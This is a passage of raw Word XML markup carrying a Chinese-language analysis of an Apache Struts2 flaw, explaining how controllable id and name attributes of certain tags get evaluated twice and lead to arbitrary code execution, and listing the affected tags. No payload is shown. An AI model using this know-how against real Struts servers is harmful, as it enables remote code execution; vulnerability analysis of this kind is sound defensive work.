              <w:t xml:space="preserve"> String </w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="999999"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>findStringIfAltSyntax</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="F99157"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(String expr)</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="6699CC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>{</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ab/>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="CC99CC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> (altSyntax()) {</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ab/>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="CC99CC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> findString(expr);</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ab/>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:tab/>
              <w:t>}</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ab/>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="CC99CC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> expr;</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ab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidRDefault="003A5856" w:rsidP="003A5856">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>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所以说这里凡是调用了</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>org.apache.struts2.components.UIBean.populateComponentHtmlId(Form)</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>方法的标签都存在二次解析的问题，通过</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>eclipse</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>很简单就可以找到有哪些标签存在这个问题，如下图</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="2CA6CB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FAC7FA7" wp14:editId="07AA0828">
            <wp:extent cx="5580380" cy="2300205"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13" name="图片 13" descr="https://www.iswin.org/attach/struts2_id_3.png">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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swin.org/attach/struts2_id_3.png">
                      <a:hlinkClick r:id="rId12" tooltip="&quo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2300205"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>所以下列标签中的</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>属性只要可控，那么就会导致任意代码执行的问题</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="95"/>
        <w:gridCol w:w="2439"/>
      </w:tblGrid>
      <w:tr w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidTr="003A5856">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidRDefault="003A5856" w:rsidP="003A585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textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="666666"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="666666"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>1</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2</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3</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4</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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidRDefault="003A5856" w:rsidP="003A585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CCCCCC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>&lt;s:head id=</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="99CC99"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>""</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>/&gt;</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&lt;s:file id=</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="99CC99"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>""</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>/&gt;</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&lt;s:reset id=</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="99CC99"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>""</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>/&gt;</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&lt;s:submit id=</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="99CC99"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>""</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>/&gt;</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&lt;s:updownselect id=</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="99CC99"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>""</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> list=</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="99CC99"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>""</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>/&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidRDefault="003A5856" w:rsidP="003A5856">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="240"/>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另一类为</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>属性，</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>属性的二次解析需要标签中的</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>为空，这样才能进行二次代码执行，由于</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>属性调用了</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>org.apache.struts2.components.Component.completeExpressionIfAltSyntax(String)</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>该方法，该方法定义如下</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="95"/>
        <w:gridCol w:w="4820"/>
      </w:tblGrid>
      <w:tr w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidTr="003A5856">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidRDefault="003A5856" w:rsidP="003A585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textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="666666"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="666666"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>1</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2</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3</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4</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5</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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidRDefault="003A5856" w:rsidP="003A585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CCCCCC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="CC99CC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>protected</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="6699CC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> String </w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="999999"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>completeExpressionIfAltSyntax</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="F99157"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(String expr)</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="6699CC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>{</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ab/>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="CC99CC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> (altSyntax()) {</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ab/>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="CC99CC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
